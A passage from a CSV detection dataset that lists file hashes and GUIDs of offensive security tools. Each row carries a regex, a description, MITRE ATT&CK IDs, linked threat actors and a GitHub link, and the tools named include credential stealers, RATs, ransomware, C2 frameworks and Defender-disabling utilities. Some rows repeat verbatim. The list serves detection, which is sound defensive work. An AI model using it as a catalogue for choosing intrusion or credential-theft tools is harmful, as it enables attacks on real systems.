Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25531" "*42f2eae86bb872932ad6081d3b146a59aa2cc109e3a975c3e0a41f41e80599a3*",".{0,1000}42f2eae86bb872932ad6081d3b146a59aa2cc109e3a975c3e0a41f41e80599a3.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25532" "*430291aab4a597081838f02b2ceabce6f5c8bd59334244c82229e4c648d28ac6*",".{0,1000}430291aab4a597081838f02b2ceabce6f5c8bd59334244c82229e4c648d28ac6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25534" 
"*43195f385c68a53280d094289acfe2730ed0c503053e704a33a563e0aa0825fe*",".{0,1000}43195f385c68a53280d094289acfe2730ed0c503053e704a33a563e0aa0825fe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","25535" "*4323e08164a3e0249f03d697dd22398b7ce185879581a4fc23588bb9a4d50ae6*",".{0,1000}4323e08164a3e0249f03d697dd22398b7ce185879581a4fc23588bb9a4d50ae6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25537" "*4326c3679fa4ee537a32a69abbbd19890aec7d108ad19d3a86eb3724213e031c*",".{0,1000}4326c3679fa4ee537a32a69abbbd19890aec7d108ad19d3a86eb3724213e031c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25538" "*4328364d7fbb9555b5602f2c980475917bc34f73e6839da366d52a277715c37e*",".{0,1000}4328364d7fbb9555b5602f2c980475917bc34f73e6839da366d52a277715c37e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25539" 
"*43299df4a5e2edbfcc0443c9555b10a8a603015a20213f63a7e0e2b7923a4603*",".{0,1000}43299df4a5e2edbfcc0443c9555b10a8a603015a20213f63a7e0e2b7923a4603.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25540" "*432bb0868bd1152ce689dda88d274bb05671174c5c892c7db0575e50abcadf4c*",".{0,1000}432bb0868bd1152ce689dda88d274bb05671174c5c892c7db0575e50abcadf4c.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#filehash","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","25541" "*4334cdefe34ccba3224c79ed27d7feb1980e8f138a6dd0f993f6f830caa2476b*",".{0,1000}4334cdefe34ccba3224c79ed27d7feb1980e8f138a6dd0f993f6f830caa2476b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25542" "*433b8dd9a46d99f08c74b3ed9989848fe2e90498fbdac603b27812fb89be9340*",".{0,1000}433b8dd9a46d99f08c74b3ed9989848fe2e90498fbdac603b27812fb89be9340.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","25543" "*433d24896033946acf7ccde0ff7a7d5d0d8608bf1601ac55554d31219dac9995*",".{0,1000}433d24896033946acf7ccde0ff7a7d5d0d8608bf1601ac55554d31219dac9995.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","25544" "*433d59580b95a3e3b82364729aac65643385eb4500c46eae2aab1c0567df03e6*",".{0,1000}433d59580b95a3e3b82364729aac65643385eb4500c46eae2aab1c0567df03e6.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","#filehash","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","25545" "*43438e6c4a6683e369fdd9bf0d65f934e0ce0387374607269f0cb707a742d09a*",".{0,1000}43438e6c4a6683e369fdd9bf0d65f934e0ce0387374607269f0cb707a742d09a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","25546" "*4347d68bd769cf25fa1046b8c9c3f5f4c1c83ae6b96ac1d3ed4b8dce7647c22c*",".{0,1000}4347d68bd769cf25fa1046b8c9c3f5f4c1c83ae6b96ac1d3ed4b8dce7647c22c.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","25547" "*4349B8A8-F17B-44D5-AE4D-21BE9C9D1573*",".{0,1000}4349B8A8\-F17B\-44D5\-AE4D\-21BE9C9D1573.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25549" "*4350a69f2630214a7b079e41e3ac2d7c5759a622a0cd1227ba12eee06d758d9a*",".{0,1000}4350a69f2630214a7b079e41e3ac2d7c5759a622a0cd1227ba12eee06d758d9a.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - 
T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","25552" "*4351D871B1B4CB1BA8F54C52A6786C809707A05353B46EA1AF9A4950D88C4E61*",".{0,1000}4351D871B1B4CB1BA8F54C52A6786C809707A05353B46EA1AF9A4950D88C4E61.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","25554" "*43565fef63fccc1c7ad4781870b96ac61b93974ac1495700ee461621ed6b432c*",".{0,1000}43565fef63fccc1c7ad4781870b96ac61b93974ac1495700ee461621ed6b432c.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","25556" "*4358d271e8e3db49fc9ba98ab0709727f9043a129b5978ebaa23881f60b26b64*",".{0,1000}4358d271e8e3db49fc9ba98ab0709727f9043a129b5978ebaa23881f60b26b64.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","25557" 
"*435c30dbc7c59f5d013f8088b1f9be04ba003a4d04d7f69d8006bdf190a84bee*",".{0,1000}435c30dbc7c59f5d013f8088b1f9be04ba003a4d04d7f69d8006bdf190a84bee.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","25558" "*436a88ff9bedb6b4264d64e28be4a4c1b41e125bfa5fdab941c6d045d9a4e77e*",".{0,1000}436a88ff9bedb6b4264d64e28be4a4c1b41e125bfa5fdab941c6d045d9a4e77e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25560" "*436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438*",".{0,1000}436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#filehash","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","25561" "*4370e110d8731b6b6fbb98d9ae2ffae6a3b00a8329b2700e86b15e1bd97166c1*",".{0,1000}4370e110d8731b6b6fbb98d9ae2ffae6a3b00a8329b2700e86b15e1bd97166c1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25562" "*4373252deaaf3b0ae87b409669e592e94cf501f02da96ccf9a62f76244048a74*",".{0,1000}4373252deaaf3b0ae87b409669e592e94cf501f02da96ccf9a62f76244048a74.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25564" "*4374b7f67ac23d9fc63fac8b9da7e279edd897ee5854d6a67c64ec648974e3fa*",".{0,1000}4374b7f67ac23d9fc63fac8b9da7e279edd897ee5854d6a67c64ec648974e3fa.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","25565" "*4379af4a67693b483f0b935117a0b377a63a725032da0a25b62dc883a02280b6*",".{0,1000}4379af4a67693b483f0b935117a0b377a63a725032da0a25b62dc883a02280b6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - 
T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25567" "*437c338d694eab03b98922ad42d0ad890be0e7c94be0a278115e638e2dad27c0*",".{0,1000}437c338d694eab03b98922ad42d0ad890be0e7c94be0a278115e638e2dad27c0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25568" "*437f2e82e5fd2de01257379e1e155f380ad173c35f32a02eeedd1a06a262e8a3*",".{0,1000}437f2e82e5fd2de01257379e1e155f380ad173c35f32a02eeedd1a06a262e8a3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25569" "*437fe49b059cae6e3fa58e998cc73d10c309fe76c0c2ce6e49e936589dcfd474*",".{0,1000}437fe49b059cae6e3fa58e998cc73d10c309fe76c0c2ce6e49e936589dcfd474.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - 
T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25570" "*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25571" "*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25572" "*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25573" "*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25574" "*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25575" "*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25576" "*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25577" 
"*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25578" "*438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6*",".{0,1000}438257b96cb3f726b6f796f81c5d72d6c9681f3e617ce272b6250a86496fc9c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25579" "*438bf6db9eece197ef8d3e133a7e229086b5682d*",".{0,1000}438bf6db9eece197ef8d3e133a7e229086b5682d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","25582" "*438dbddd65bd3110fe61ebe3266d1cb441ea25dfc13cb626c076203e5721244d*",".{0,1000}438dbddd65bd3110fe61ebe3266d1cb441ea25dfc13cb626c076203e5721244d.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","25583" "*438f9082ae1cd3bc27027e8d1a14adcc96768fe52dea5594e31487d01f0dd250*",".{0,1000}438f9082ae1cd3bc27027e8d1a14adcc96768fe52dea5594e31487d01f0dd250.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25584" "*43A031B0-E040-4D5E-B477-02651F5E3D62*",".{0,1000}43A031B0\-E040\-4D5E\-B477\-02651F5E3D62.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#GUIDproject","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","25586" 
"*43a56d6c2de9c58277b8b10b2ad348d2b18b7d440ebf12b3c3c7099fcd06d9e7*",".{0,1000}43a56d6c2de9c58277b8b10b2ad348d2b18b7d440ebf12b3c3c7099fcd06d9e7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25587" "*43a7a1b32cc0536407af440786bb716c90f309647e1da3eda3d21fbd08b2338f*",".{0,1000}43a7a1b32cc0536407af440786bb716c90f309647e1da3eda3d21fbd08b2338f.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","25588" "*43ac133ca47ed9916e78d39f8a3bd05bc8ef31f3925ccaa4b24e769f47e2f61f*",".{0,1000}43ac133ca47ed9916e78d39f8a3bd05bc8ef31f3925ccaa4b24e769f47e2f61f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25590" "*43b5fbace7d714684822e05f4ceb05e77ca3dc638861003086a5ea96bd7b0257*",".{0,1000}43b5fbace7d714684822e05f4ceb05e77ca3dc638861003086a5ea96bd7b0257.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
